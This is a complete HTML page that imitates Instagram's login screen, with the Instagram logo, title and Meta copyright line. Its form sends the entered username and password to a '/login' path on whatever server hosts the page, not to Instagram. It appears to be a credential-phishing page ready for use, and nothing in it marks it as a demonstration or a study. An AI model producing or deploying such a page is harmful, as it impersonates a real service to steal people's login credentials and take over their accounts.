<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover" />
  <title>Log in • Instagram</title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.min.css">
  <style>
    body {
      background-color: var(--bg, #fff);
      color: var(--fg, #000);
      font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
      display: flex; justify-content: center; align-items: center;
      min-height: 100vh; margin: 0; padding: 1rem;
    }
    @media (prefers-color-scheme: dark) {
      :root { --bg: #000; --fg: #fff; }
    }
    .login-container {
      max-width: 350px; width: 100%;
      border: 1px solid #ddd; padding: 2rem;
      background-color: var(--bg);
    }
    .logo { display: block; margin: 0 auto 1rem; width: 175px; }
    input { width: 100%; padding: 0.75rem; margin-bottom: 0.5rem; border: 1px solid #ddd; border-radius: 4px; font-size: 1rem; }
    button { width: 100%; background: #3897f0; color: #fff; padding: 0.75rem; border: none; border-radius: 4px; font-size: 1rem; cursor: pointer; }
    .footer { text-align: center; font-size: 12px; margin-top: 1rem; color: #8e8e8e; }
    .footer a { color: inherit; text-decoration: none; margin: 0 0.25rem; }
  </style>
</head>
<body>
  <div class="login-container">
    <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/175px-Instagram_logo.svg.png" alt="Instagram">
    <form action="/login" method="POST">
      <input name="username" type="text" placeholder="Phone number, username, or email" required />
      <input name="password" type="password" placeholder="Password" required />
      <button type="submit">Log In</button>
    </form>
    <div class="footer">
      <a href="#">About</a>·<a href="#">Help</a>·<a href="#">Press</a>·<a href="#">API</a>·<a href="#">Jobs</a>·<a href="#">Privacy</a>·<a href="#">Terms</a>·<a href="#">Locations</a><br>
      © <span id="year"></span> Meta Platforms, Inc.
    </div>
  </div>
  <script>
    document.getElementById('year').innerText = new Date().getFullYear();
  </script>
</body>
</html>